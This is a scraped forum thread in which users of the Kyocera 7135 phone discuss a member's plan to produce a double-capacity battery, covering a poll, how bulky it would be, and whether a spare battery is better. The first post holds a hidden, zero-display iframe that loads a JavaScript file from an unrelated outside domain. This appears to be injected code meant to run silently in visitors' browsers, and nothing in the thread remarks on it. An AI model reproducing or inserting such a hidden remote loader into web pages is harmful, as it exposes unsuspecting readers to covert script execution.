Poll: Do you want a double capacity battery?

+ Reply to Thread
Page 1 of 2 1 2 LastLast

Double Capacity Batteries

All right....today I did a true test of battery life, and after about 100 mins of talk time, no backlight, 9 hours of standby, and 15 minutes of palm use my battery died after a full charge. If any of you are like me, that isn't really acceptable. SO, because a high capacity battery is not available, and there are NO plans to make one according to Kyocera, I designed one and am getting it manufactured asap by a friend of mine. Would you guys be interested in a double capacity battery? I love the phone. I love the phone. I love the phone. But the battery life just wont do. Please give me your thoughts, and do so quickly because I'm getting the design in soon.

Please reply to this with your thoughts, and vote above on the poll. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'd definitely be interested; one question I'd have is what the form factor would be -- I presume the extended life battery would stick out the back, and the back cover would have to be replaced? Would that be the case?

Basically it looks like the 7135 is about 3 months pregnant...imagine the back simply extended the depth of one more battery, with the edges smoothed out. It may not be quite as sexy, but sometimes that is the price you have to pay for functionality. From the front, she will still look great. Actually, the prototype is a bit easier to hold in your hand, in my opinion, but it does make it a bit thicker. And thanks to Kyocera, the belt holster allows it to fit.

Re: Double Capacity Batteries

I would like to purchase a double life battery.

Heck. I've got every other 7035 accessory (except the phone).

I'm in.

Maybe, depending on price.

So far I've got no complaints about my battery life. I think I'd just buy an extra battery before I'd buy something that pregnated my 7135.

jazmaan:

Originally posted by jazmaan
    So far I've got no complaints about my battery life. I think I'd just buy an extra battery before I'd buy something that pregnated my 7135.
    Same here ... if I'm THAT desperate for power, I'll just buy another battery (or two). I think I can exert the physical activity involved in replacing the battery!

Besides ... a double life battery as described won't fit into the leather pouch. OTOH neither will a second battery -- but that's what pockets are for!

I personally would rather just carry a spare battery in my pocket. But it is a decent idea and I will be curious to hear how well it works out Are you going to also have a "9 months pregnant" battery made? Nothing is sexier than a 9 month pregnant phone that has 10 hours talk time
    Please visit my picture site: Robert-O-Rama :)

Robert:

Originally posted by Robert K.
    I personally would rather just carry a spare battery in my pocket. But it is a decent idea and I will be curious to hear how well it works out Are you going to also have a "9 months pregnant" battery made? Nothing is sexier than a 9 month pregnant phone that has 10 hours talk time
    Actually, what COULD be a workable solution is to have a battery PACK which plugs into the AC socket of the 7135, which would clip onto a belt. FYI this has been done for years with photographers using pro SLRs.

Of course, we COULD have a 7135 battery in an RV with a NINE YEAR battery life!

poked back in
    2 hour battery life? Did you try jazmaan's initial battery charge overkill?

Well, I can't say I'd agree that a 9 month pregnant phone would still look great, I'd stick with the three month version. Initial calculations indicate we should get almost TRIPLE the battery life, rather than just double. Ever notice how battery life seems to drop much more quickly on the last bar or two? We'll see how it works.

So far I have not had less than 50% battery left after a 14 hour day, one day with 85 min of voice and data use.
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by Paradigm Shift
    Well, I can't say I'd agree that a 9 month pregnant phone would still look great, I'd stick with the three month version.
    lol... ok, I wasn't really being serious about a 9 month version. That would be cool if you achieve triple. I'm assuming this would not be your primary battery, but more for occasions where you know you won't be able to charge the 7135 with the standard battery? To me the standard battery is small enough to carry around without any trouble. What will you keep your 3 month pregnant 7135 in? It won't fit in any of the cases/holsters/pouches designed for the 7135 will it? Is it going to cost you a lot of $$$ to get the battery made?

Double or triple battery life would be awesome-- preggers or not! I have lots of analog-only areas nearby, I know I'm going to be pushing it....

Actually, it won't cost me much to get it made. And the phone will still fit into the standard issue holster.

I've already got a spare standard battery. I've only used it once. I'd probably be willing to buy an extended version, but my decision would be based mostly on price.
    Sorry, but I no longer make 7135 headset adapters.

How will the finished product look? OEM? Is the cover integrated with the battery?
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Robert,

Does this mean that you are contemplating coming *back* from the Dark Side???

Originally posted by jsimonson0
    Robert,

Does this mean that you are contemplating coming *back* from the Dark Side???
    That has ALWAYS been the plan! The Dark Side is a very nice to VISIT... but I wouldn't want to live there in my Treo House forever